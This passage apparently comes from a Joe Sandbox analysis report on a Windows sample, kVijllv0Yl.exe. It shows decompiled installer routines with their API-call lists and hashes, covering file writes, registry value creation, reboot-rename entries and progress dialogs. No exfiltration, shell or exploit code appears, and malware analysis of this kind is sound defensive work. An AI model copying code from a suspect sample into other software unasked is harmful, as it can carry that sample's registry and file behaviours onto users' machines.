                  									_t54 = _t54 + 1;
                  								} while (_t54 < _t44);
                  								goto L21;
                  							}
                  							E00405A85(_t51 + _t47, "[Rename]\r\n");
                  							_t47 = _t47 + 0xa;
                  							goto L13;
                  						}
                  					}
                  				} else {
                  					CloseHandle(E0040575C(_t49, 0, 1));
                  					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                  					if(_t16 != 0 && _t16 <= 0x400) {
                  						goto L5;
                  					}
                  				}
                  				return _t16;
                  			}

                  APIs
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                  • GetShortPathNameA.KERNEL32 ref: 00405829
                  • GetShortPathNameA.KERNEL32 ref: 00405846
                  • wsprintfA.USER32 ref: 00405864
                  • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                  • GlobalFree.KERNEL32 ref: 00405923
                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                  • String ID: %s=%s$(&B$[Rename]
                  • API String ID: 3772915668-1834469719
                  • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                  • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                  • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                  • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00405CE3(CHAR* _a4) {
                  				char _t5;
                  				char _t7;
                  				char* _t15;
                  				char* _t16;
                  				CHAR* _t17;
                  
                  				_t17 = _a4;
                  				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                  					_t17 =  &(_t17[4]);
                  				}
                  				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                  					_t17 =  &(_t17[2]);
                  				}
                  				_t5 =  *_t17;
                  				_t15 = _t17;
                  				_t16 = _t17;
                  				if(_t5 != 0) {
                  					do {
                  						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                  							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                  							_t16 = CharNextA(_t16);
                  						}
                  						_t17 = CharNextA(_t17);
                  						_t5 =  *_t17;
                  					} while (_t5 != 0);
                  				}
                  				 *_t16 =  *_t16 & 0x00000000;
                  				while(1) {
                  					_t16 = CharPrevA(_t15, _t16);
                  					_t7 =  *_t16;
                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                  						break;
                  					}
                  					 *_t16 =  *_t16 & 0x00000000;
                  					if(_t15 < _t16) {
                  						continue;
                  					}
                  					break;
                  				}
                  				return _t7;
                  			}

                  APIs
                  • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                  • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                  • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                  • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Char$Next$Prev
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 589700163-1661435704
                  • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                  • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                  • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                  • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                  				struct tagLOGBRUSH _v16;
                  				long _t35;
                  				long _t37;
                  				void* _t40;
                  				long* _t49;
                  
                  				if(_a4 + 0xfffffecd > 5) {
                  					L15:
                  					return 0;
                  				}
                  				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                  				if(_t49 == 0) {
                  					goto L15;
                  				}
                  				_t35 =  *_t49;
                  				if((_t49[5] & 0x00000002) != 0) {
                  					_t35 = GetSysColor(_t35);
                  				}
                  				if((_t49[5] & 0x00000001) != 0) {
                  					SetTextColor(_a8, _t35);
                  				}
                  				SetBkMode(_a8, _t49[4]);
                  				_t37 = _t49[1];
                  				_v16.lbColor = _t37;
                  				if((_t49[5] & 0x00000008) != 0) {
                  					_t37 = GetSysColor(_t37);
                  					_v16.lbColor = _t37;
                  				}
                  				if((_t49[5] & 0x00000004) != 0) {
                  					SetBkColor(_a8, _t37);
                  				}
                  				if((_t49[5] & 0x00000010) != 0) {
                  					_v16.lbStyle = _t49[2];
                  					_t40 = _t49[3];
                  					if(_t40 != 0) {
                  						DeleteObject(_t40);
                  					}
                  					_t49[3] = CreateBrushIndirect( &_v16);
                  				}
                  				return _t49[3];
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                  • String ID:
                  • API String ID: 2320649405-0
                  • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                  • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                  • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                  • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0040266E(struct _OVERLAPPED* __ebx) {
                  				void* _t27;
                  				long _t32;
                  				struct _OVERLAPPED* _t47;
                  				void* _t51;
                  				void* _t53;
                  				void* _t56;
                  				void* _t57;
                  				void* _t58;
                  
                  				_t47 = __ebx;
                  				 *(_t58 - 8) = 0xfffffd66;
                  				_t52 = E004029E8(0xfffffff0);
                  				 *(_t58 - 0x44) = _t24;
                  				if(E004055E5(_t52) == 0) {
                  					E004029E8(0xffffffed);
                  				}
                  				E0040573D(_t52);
                  				_t27 = E0040575C(_t52, 0x40000000, 2);
                  				 *(_t58 + 8) = _t27;
                  				if(_t27 != 0xffffffff) {
                  					_t32 =  *0x423eb4;
                  					 *(_t58 - 0x2c) = _t32;
                  					_t51 = GlobalAlloc(0x40, _t32);
                  					if(_t51 != _t47) {
                  						E004031DA(_t47);
                  						E004031A8(_t51,  *(_t58 - 0x2c));
                  						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                  						 *(_t58 - 0x30) = _t56;
                  						if(_t56 != _t47) {
                  							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                  							while( *_t56 != _t47) {
                  								_t49 =  *_t56;
                  								_t57 = _t56 + 8;
                  								 *(_t58 - 0x38) =  *_t56;
                  								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                  								_t56 = _t57 +  *(_t58 - 0x38);
                  							}
                  							GlobalFree( *(_t58 - 0x30));
                  						}
                  						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                  						GlobalFree(_t51);
                  						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                  					}
                  					CloseHandle( *(_t58 + 8));
                  				}
                  				_t53 = 0xfffffff3;
                  				if( *(_t58 - 8) < _t47) {
                  					_t53 = 0xffffffef;
                  					DeleteFileA( *(_t58 - 0x44));
                  					 *((intOrPtr*)(_t58 - 4)) = 1;
                  				}
                  				_push(_t53);
                  				E00401423();
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                  				return 0;
                  			}












                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                  • GlobalFree.KERNEL32 ref: 00402717
                  • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                  • GlobalFree.KERNEL32 ref: 00402730
                  • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                  • String ID:
                  • API String ID: 3294113728-0
                  • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                  • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                  • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                  • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404E23(CHAR* _a4, CHAR* _a8) {
                  				struct HWND__* _v8;
                  				signed int _v12;
                  				CHAR* _v32;
                  				long _v44;
                  				int _v48;
                  				void* _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				CHAR* _t26;
                  				signed int _t27;
                  				CHAR* _t28;
                  				long _t29;
                  				signed int _t39;
                  
                  				_t26 =  *0x423684;
                  				_v8 = _t26;
                  				if(_t26 != 0) {
                  					_t27 =  *0x423f54;
                  					_v12 = _t27;
                  					_t39 = _t27 & 0x00000001;
                  					if(_t39 == 0) {
                  						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                  					}
                  					_t26 = lstrlenA(0x41fc70);
                  					_a4 = _t26;
                  					if(_a8 == 0) {
                  						L6:
                  						if((_v12 & 0x00000004) == 0) {
                  							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                  						}
                  						if((_v12 & 0x00000002) == 0) {
                  							_v32 = 0x41fc70;
                  							_v52 = 1;
                  							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                  							_v44 = 0;
                  							_v48 = _t29 - _t39;
                  							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                  							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                  						}
                  						if(_t39 != 0) {
                  							_t28 = _a4;
                  							 *((char*)(_t28 + 0x41fc70)) = 0;
                  							return _t28;
                  						}
                  					} else {
                  						_t26 =  &(_a4[lstrlenA(_a8)]);
                  						if(_t26 < 0x800) {
                  							_t26 = lstrcatA(0x41fc70, _a8);
                  							goto L6;
                  						}
                  					}
                  				}
                  				return _t26;
                  			}


















                  APIs
                  • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                  • String ID:
                  • API String ID: 2531174081-0
                  • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                  • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                  • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                  • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                  				long _v8;
                  				signed char _v12;
                  				unsigned int _v16;
                  				void* _v20;
                  				intOrPtr _v24;
                  				long _v56;
                  				void* _v60;
                  				long _t15;
                  				unsigned int _t19;
                  				signed int _t25;
                  				struct HWND__* _t28;
                  
                  				_t28 = _a4;
                  				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                  				if(_a8 == 0) {
                  					L4:
                  					_v56 = _t15;
                  					_v60 = 4;
                  					SendMessageA(_t28, 0x110c, 0,  &_v60);
                  					return _v24;
                  				}
                  				_t19 = GetMessagePos();
                  				_v16 = _t19 >> 0x10;
                  				_v20 = _t19;
                  				ScreenToClient(_t28,  &_v20);
                  				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                  				if((_v12 & 0x00000066) != 0) {
                  					_t15 = _v8;
                  					goto L4;
                  				}
                  				return _t25 | 0xffffffff;
                  			}















                  APIs
                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                  • GetMessagePos.USER32 ref: 00404715
                  • ScreenToClient.USER32 ref: 0040472F
                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Message$Send$ClientScreen
                  • String ID: f
                  • API String ID: 41195575-1993550816
                  • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                  • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                  • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                  • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                  				char _v68;
                  				void* _t11;
                  				CHAR* _t19;
                  
                  				if(_a8 == 0x110) {
                  					SetTimer(_a4, 1, 0xfa, 0);
                  					_a8 = 0x113;
                  				}
                  				if(_a8 == 0x113) {
                  					_t11 = E00402BA9();
                  					_t19 = "unpacking data: %d%%";
                  					if( *0x423eb0 == 0) {
                  						_t19 = "verifying installer: %d%%";
                  					}
                  					wsprintfA( &_v68, _t19, _t11);
                  					SetWindowTextA(_a4,  &_v68);
                  					SetDlgItemTextA(_a4, 0x406,  &_v68);
                  				}
                  				return 0;
                  			}







                  APIs
                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                  • wsprintfA.USER32 ref: 00402B7C
                  • SetWindowTextA.USER32(?,?), ref: 00402B8C
                  • SetDlgItemTextA.USER32 ref: 00402B9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Text$ItemTimerWindowwsprintf
                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                  • API String ID: 1451636040-1158693248
                  • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                  • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                  • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                  • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E004022F5(void* __eax) {
                  				void* _t15;
                  				char* _t18;
                  				int _t19;
                  				char _t24;
                  				int _t27;
                  				intOrPtr _t35;
                  				void* _t37;
                  
                  				_t15 = E00402ADD(__eax);
                  				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                  				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                  				 *(_t37 - 0x44) = E004029E8(2);
                  				_t18 = E004029E8(0x11);
                  				_t31 =  *0x423f50 | 0x00000002;
                  				 *(_t37 - 4) = 1;
                  				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
                  				if(_t19 == 0) {
                  					if(_t35 == 1) {
                  						E004029E8(0x23);
                  						_t19 = lstrlenA(0x40a368) + 1;
                  					}
                  					if(_t35 == 4) {
                  						_t24 = E004029CB(3);
                  						 *0x40a368 = _t24;
                  						_t19 = _t35;
                  					}
                  					if(_t35 == 3) {
                  						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                  					}
                  					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                  						 *(_t37 - 4) = _t27;
                  					}
                  					_push( *(_t37 + 8));
                  					RegCloseKey();
                  				}
                  				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                  				return 0;
                  			}











                  APIs
                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg69F4.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg69F4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsg69F4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CloseCreateValuelstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp
                  • API String ID: 1356686001-2528760469
                  • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                  • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                  • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                  • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00402BC5(intOrPtr _a4) {
                  				char _v68;
                  				long _t6;
                  				struct HWND__* _t7;
                  				struct HWND__* _t14;
                  
                  				if(_a4 != 0) {
                  					_t14 =  *0x417044; // 0x0
                  					if(_t14 != 0) {
                  						_t14 = DestroyWindow(_t14);
                  					}
                  					 *0x417044 = 0;
                  					return _t14;
                  				}
                  				__eflags =  *0x417044; // 0x0
                  				if(__eflags != 0) {
                  					return E00405DDC(0);
                  				}
                  				_t6 = GetTickCount();
                  				__eflags = _t6 -  *0x423eac;
                  				if(_t6 >  *0x423eac) {
                  					__eflags =  *0x423ea8;
                  					if( *0x423ea8 == 0) {
                  						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                  						 *0x417044 = _t7;
                  						return _t7;
                  					}
                  					__eflags =  *0x423f54 & 0x00000001;
                  					if(( *0x423f54 & 0x00000001) != 0) {
                  						wsprintfA( &_v68, "... %d%%", E00402BA9());
                  						return E00404E23(0,  &_v68);
                  					}
                  				}
                  				return _t6;
                  			}








                  APIs
                  • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                  • GetTickCount.KERNEL32 ref: 00402BFB
                  • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                    • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,00001531), ref: 00402BBE
                  • wsprintfA.USER32 ref: 00402C29
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
